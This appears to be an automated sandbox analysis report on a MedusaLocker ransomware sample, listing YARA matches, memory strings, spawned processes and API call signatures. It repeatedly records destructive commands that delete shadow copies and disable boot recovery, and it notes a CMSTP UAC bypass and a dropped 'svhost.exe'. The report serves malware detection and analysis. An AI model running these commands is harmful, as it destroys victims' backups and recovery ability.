                        Source: vssadmin.exe, 0000000D.00000002.265657426.0000000002CE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\SysWOW64\vssadmin.exevssadmin.exe Delete Shadows /All /QuietC:\Windows\SYSTEM32\vssadmin.exeWinsta0\Default=::=::\ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\RoamingCommonProgramFiles=C:\Program Files (x86)\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=computerComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\computerNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;PATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=x86PROCESSOR_ARCHITEW6432=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 85 Stepping 7, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=5507ProgramData=C:\ProgramDataProgramFiles=C:\Program Files (x86)ProgramFiles(x86)=C:\Program Files (x86)ProgramW6432=C:\Program FilesPSModulePath=C:\Program Files (x86)\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSESSIONNAME=ConsoleSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempUSERDOMAIN=computerUSERDOMAIN_ROAMINGPROFILE=computerUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\WindowsyvZ
                        Source: vssadmin.exe, 0000000D.00000002.265657426.0000000002CE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vssadmin.exe Delete Shadows /All /Quiet
                        Source: vssadmin.exe, 0000000D.00000002.265657426.0000000002CE0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vssadmin.exe Delete Shadows /All /Quiet1vZ
                        Source: vssadmin.exe, 0000000D.00000002.265633749.0000000002C60000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vssadmin.exeDeleteShadows/All/Quiet
                        Source: vssadmin.exe, 0000000D.00000002.265273437.00000000008E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: C:\Users\user\Desktop\C:\Windows\SysWOW64\vssadmin.exevssadmin.exe Delete Shadows /All /QuietC:\Windows\SYSTEM32\vssadmin.exeWinsta0\Defaults8
                        Source: vssadmin.exe, 0000000D.00000002.265248671.000000000052C000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: - Code: ADMPROCC00001737- Call: ADMPROCC00001712- PID: 00005932- TID: 00005820- CMD: vssadmin.exe Delete Shadows /All /Quiet - User: Name: computer\user, SID:S-1-5-21-3853321935-2125563209-4053062332-1002
                        Source: 98j0BL6iLT.exeBinary or memory string: [LOCKER] Lock drive vssadmin.exe Delete Shadows /All /Quietbcdedit.exe /set {default} recoveryenabled No
                        Source: C:\Users\user\AppData\Roaming\svhost.exeCode function: 1_2_00E65DA0 std::ios_base::good,CryptStringToBinaryA,GetProcessHeap,HeapAlloc,CryptStringToBinaryA,CryptImportKey,GetProcessHeap,HeapFree,1_2_00E65DA0

                        System Summary

                        Source: 98j0BL6iLT.exe, type: SAMPLEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 98j0BL6iLT.exe, type: SAMPLEMatched rule: Detects MedusaLocker ransomware Author: ditekshen
                        Source: 98j0BL6iLT.exe, type: SAMPLEMatched rule: Detect MedusaLocker ransomware Author: Arkbird_SOLG
                        Source: 0.0.98j0BL6iLT.exe.9d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 0.0.98j0BL6iLT.exe.9d0000.0.unpack, type: UNPACKEDPEMatched rule: Detects MedusaLocker ransomware Author: ditekshen
                        Source: 1.2.svhost.exe.e50000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
Source: 1.2.svhost.exe.e50000.0.unpack, type: UNPACKEDPE | Matched rule: Detects MedusaLocker ransomware | Author: ditekshen
Source: 1.0.svhost.exe.e50000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen
Source: 1.0.svhost.exe.e50000.0.unpack, type: UNPACKEDPE | Matched rule: Detects MedusaLocker ransomware | Author: ditekshen
Source: C:\Users\user\AppData\Roaming\svhost.exe, type: DROPPED | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) | Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\svhost.exe, type: DROPPED | Matched rule: Detects MedusaLocker ransomware | Author: ditekshen
Source: 98j0BL6iLT.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 98j0BL6iLT.exe, type: SAMPLE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 98j0BL6iLT.exe, type: SAMPLE | Matched rule: MALWARE_Win_MedusaLocker author = ditekshen, description = Detects MedusaLocker ransomware, clamav_sig = MALWARE.Win.Ransomware.MedusaLocker
Source: 98j0BL6iLT.exe, type: SAMPLE | Matched rule: RAN_MedusaLocker_Aug_2021_1 date = 2021-08-08, hash5 = 0abb4a302819cdca6c9f56893ca2b52856b55a0aa68a3cb8bdcd55dcc1fad9ad, hash4 = c2a0a317d73c96428ab088a8f0636ec4ccace7ca691c84ed66a83a70183f40dc, hash3 = a25c0227728878c386ab6dba139976cb10e853dd3cd1eb3623f236ee8e1df212, hash2 = 212e7f5ed4a581b4d778dfef226738c6db56b4b4006526259392d03062587887, hash1 = 4f9a833e79092006c06203a66b41fc9250bcebcee148fea404db75d52035131c, author = Arkbird_SOLG, description = Detect MedusaLocker ransomware, adversary = RaaS, hash6 = f5fb7fa5231c18f0951c755c4cb0ec07b0889b5e320f42213cbf6bbbe499ad31, reference = Internal Research, tlp = white
Source: 0.0.98j0BL6iLT.exe.9d0000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 0.0.98j0BL6iLT.exe.9d0000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_MedusaLocker author = ditekshen, description = Detects MedusaLocker ransomware, clamav_sig = MALWARE.Win.Ransomware.MedusaLocker
Source: 1.2.svhost.exe.e50000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 1.2.svhost.exe.e50000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_MedusaLocker author = ditekshen, description = Detects MedusaLocker ransomware, clamav_sig = MALWARE.Win.Ransomware.MedusaLocker
Source: 1.0.svhost.exe.e50000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 1.0.svhost.exe.e50000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_MedusaLocker author = ditekshen, description = Detects MedusaLocker ransomware, clamav_sig = MALWARE.Win.Ransomware.MedusaLocker
Source: C:\Users\user\AppData\Roaming\svhost.exe, type: DROPPED | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: C:\Users\user\AppData\Roaming\svhost.exe, type: DROPPED | Matched rule: MALWARE_Win_MedusaLocker author = ditekshen, description = Detects MedusaLocker ransomware, clamav_sig = MALWARE.Win.Ransomware.MedusaLocker
Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 1_2_00EA19FD | 1_2_00EA19FD
Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 1_2_00EA1950 | 1_2_00EA1950
Source: 98j0BL6iLT.exe, 00000000.00000003.329283968.000000000323D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamebootmgr.exef# vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.355459470.000000000329E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAdobeARM.exeb! vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.336032061.000000000323F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamebootmgr.exef# vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.386685322.0000000003238000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamebootmgr.exel& vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.326523234.000000000323D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamebootmgr.exef# vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.393424723.0000000003237000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamebootmgr.exep( vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.373531329.000000000465C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamebootmgr.exej% vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.306859083.0000000003233000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .rsrcfr-cafr-fres-mxes-eszh-hkzh-twVS_VERSION_INFOStringFileInfoOriginalFilenameMUI%s\%s\%s.MUIMUI: %s checksum does not match primary file checksum vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.390600940.0000000003239000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamebootmgr.exel& vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003432000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_IsIcoRes.exe< vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.349555389.000000000465F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamebootmgr.exep( vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.332432946.000000000323D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamememdiag.exef# vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.315817825.000000000323F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamememdiag.exeh$ vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSFHelper.dll vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameIWActs.dllX vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamePerfInst.dll\ vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.430682796.000000000323A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamebootmgr.exen' vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.291506889.0000000003236000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamebootmgr.exep( vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.398388716.000000000323A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamebootmgr.exen' vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003466000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_IsIcoRes.exe< vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.342181593.0000000003231000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamememdiag.exef# vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.396374557.0000000003235000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamebootmgr.exen' vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.416421687.000000000323E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamebootmgr.exev+ vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.345672437.000000000323C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamebootmgr.exep( vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.428390812.0000000003236000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamebootmgr.exen' vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.380009715.0000000003236000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamebootmgr.exej% vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.409712206.0000000003230000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamebootmgr.exev+ vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003239000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameArmInst.dllf# vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.310430087.0000000003235000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamebootmgr.exeh$ vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.354875502.0000000004654000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamememdiag.exep( vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.339141754.000000000323B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamebootmgr.exef# vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000033FD000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_IsIcoRes.exe< vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.302565986.000000000333E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamebootmgr.exej% vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003424000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_IsIcoRes.exe< vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.413881987.000000000323A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamebootmgr.exev+ vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.394805579.000000000323E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamebootmgr.exep( vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.418707752.0000000003237000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamememdiag.exev+ vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.377334169.000000000323C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamebootmgr.exej% vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.388690490.000000000323E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamememdiag.exel& vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.421919789.000000000323F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamebootmgr.exen' vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.312480694.0000000003233000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamebootmgr.exeh$ vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.383022799.0000000003233000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamememdiag.exej% vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_IsIcoRes.exe< vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAbcpyDll.dll\ vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameADelRCP.dll\ vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameAcroTgts.dllN vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.411691406.0000000003235000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamebootmgr.exev+ vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.302565986.0000000003230000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: .rsrcfr-cafr-fres-mxes-eszh-hkzh-twVS_VERSION_INFOStringFileInfoOriginalFilenameMUI%s\%s\%s.MUIMUI: %s checksum does not match primary file checksum vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.424353002.0000000003237000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamebootmgr.exen' vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.392192847.0000000003238000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamebootmgr.exel& vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.306859083.0000000003245000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamebootmgr.exej% vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.433220680.0000000003231000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamememdiag.exen' vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000034B7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_IsIcoRes.exe< vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.355459470.0000000003396000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamearmsvc.exeZ vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.385146942.000000000323F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamebootmgr.exel& vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.401158933.0000000003232000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamememdiag.exen' vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003450000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_IsIcoRes.exe< vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003410000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilename_IsIcoRes.exe< vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.369349383.000000000323D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamebootmgr.exej% vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.288562397.0000000003239000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameArmInst.dllf# vs 98j0BL6iLT.exe
Source: 98j0BL6iLT.exe, 00000000.00000003.293380634.000000000465C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamebootmgr.exep( vs 98j0BL6iLT.exe
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 1_2_00E6EED0 std::ios_base::good,OpenSCManagerW,OpenServiceW,DeleteService,CloseServiceHandle,CloseServiceHandle | 1_2_00E6EED0
Source: 98j0BL6iLT.exe | ReversingLabs: Detection: 90%
Source: 98j0BL6iLT.exe | Virustotal: Detection: 74%
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File read: C:\Users\user\Desktop\98j0BL6iLT.exe
Source: 98j0BL6iLT.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Users\user\Desktop\98j0BL6iLT.exe C:\Users\user\Desktop\98j0BL6iLT.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\svhost.exe C:\Users\user\AppData\Roaming\svhost.exe
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Process created: C:\Windows\SysWOW64\vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
Source: C:\Windows\SysWOW64\vssadmin.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic.exe SHADOWCOPY /nointeractive
Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Process created: C:\Windows\SysWOW64\vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
Source: C:\Windows\SysWOW64\vssadmin.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic.exe SHADOWCOPY /nointeractive
Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Process created: C:\Windows\SysWOW64\vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
Source: C:\Windows\SysWOW64\vssadmin.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic.exe SHADOWCOPY /nointeractive
Source: C:\Windows\SysWOW64\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Process created: C:\Windows\SysWOW64\vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic.exe SHADOWCOPY /nointeractive
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Process created: C:\Windows\SysWOW64\vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic.exe SHADOWCOPY /nointeractive
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Process created: C:\Windows\SysWOW64\vssadmin.exe vssadmin.exe Delete Shadows /All /Quiet
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic.exe SHADOWCOPY /nointeractive
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Crypto
Source: classification engine | Classification label: mal100.rans.spre.expl.evad.winEXE@20/71@0/100
Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 1_2_00E6F730 std::ios_base::good,std::ios_base::good,task,CoInitializeEx,task,CoInitializeSecurity,CoUninitialize,task,CoCreateInstance,CoUninitialize,task,CoUninitialize,task,CoUninitialize,task,CoUninitialize,task,CoUninitialize,task,CoUninitialize,task,CoUninitialize,task,CoUninitialize,task,CoUninitialize,task,task,CoUninitialize,task,CoUninitialize,task,task,task,task,CoUninitialize,task,CoUninitialize,task,CoUninitialize,task,CoUninitialize,task,CoUninitialize,task,CoUninitialize,task,CoUninitialize,task | 1_2_00E6F730
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File read: C:\$RECYCLE.BIN\S-1-5-21-3853321935-2125563209-4053062332-1002\desktop.ini
Source: C:\Users\user\AppData\Roaming\svhost.exe | Code function: 1_2_00E6EA80 std::ios_base::good,CreateToolhelp32Snapshot,Process32FirstW,task,OpenProcess,TerminateProcess,CloseHandle,Process32NextW,CloseHandle | 1_2_00E6EA80
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4976:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5772:120:WilError_01
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | Mutant created: \Sessions\1\BaseNamedObjects\{8761ABBD-7F85-42EE-B272-A76179687C63}
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2464:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4920:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5456:120:WilError_01
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5884:120:WilError_01
Source: C:\Users\user\Desktop\98j0BL6iLT.exe | File written: C:\$RECYCLE.BIN\S-1-5-21-3853321935-2125563209-4053062332-1002\desktop.ini
Source: 98j0BL6iLT.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 98j0BL6iLT.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 98j0BL6iLT.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 98j0BL6iLT.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 98j0BL6iLT.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 98j0BL6iLT.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 98j0BL6iLT.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: 98j0BL6iLT.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: PerfInst.pdb1 | source: 98j0BL6iLT.exe, 00000000.00000003.347755634.0000000003387000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: bootmgfw.pdb | source: 98j0BL6iLT.exe, 00000000.00000003.302565986.0000000003243000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\B\127930\Acrobat\Installers\InstEntryPointBlock\Release\InstEntryPointBlock.pdb (`@ | source: 98j0BL6iLT.exe, 00000000.00000003.347755634.00000000032C1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\O\W\B\130707\ARM\BuildResults\bin\Win32\Release\armsvc.pdb A | source: 98j0BL6iLT.exe, 00000000.00000003.355459470.0000000003396000.00000004.00000020.00020000.00000000.sdmp
